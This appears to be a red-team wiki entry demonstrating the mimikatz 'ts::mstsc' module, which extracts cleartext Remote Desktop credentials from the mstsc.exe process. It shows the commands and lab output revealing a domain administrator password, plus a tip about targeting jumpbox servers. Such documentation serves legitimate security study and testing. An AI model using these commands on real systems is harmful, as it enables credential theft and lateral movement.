ts::mstsc can be used to extract cleartext credentials from the mstsc process (client side)

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # ts::mstsc
!!! Warning: false positives can be listed !!!

| PID 2992      mstsc.exe (module @ 0x000000000055F6F0)

ServerName                                [wstring] ''
ServerFqdn                                [wstring] ''
UserSpecifiedServerName                   [wstring] ''
UserName                                  [wstring] 'administrator'
Domain                                    [wstring] 'hacklab'
Password                                  [protect] 'Super_SecretPass1!'
SmartCardReaderName                       [wstring] ''
PasswordContainsSCardPin                  [ bool  ] FALSE
ServerNameUsedForAuthentication           [wstring] ''
RDmiUsername                              [wstring] 'hacklab\administrator'

It must be noted that an RDP session must be running in order to retrieve credentials via ts::mstsc. It comes in handy in jumpbox servers!

(Demonstration target is a Windows 10 Pro)

Last updated